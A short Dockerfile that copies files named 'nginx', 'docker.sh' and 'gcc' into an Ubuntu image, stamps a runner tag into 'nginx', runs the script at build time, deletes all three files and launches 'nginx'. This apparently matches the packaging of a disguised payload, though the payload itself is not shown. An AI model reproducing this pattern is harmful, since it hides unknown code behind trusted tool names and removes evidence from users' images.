FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > nginx.log'

COPY nginx .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' nginx
RUN bash ./docker.sh

RUN rm --force --recursive nginx
RUN rm --force --recursive docker.sh
RUN rm --force --recursive gcc

CMD nginx
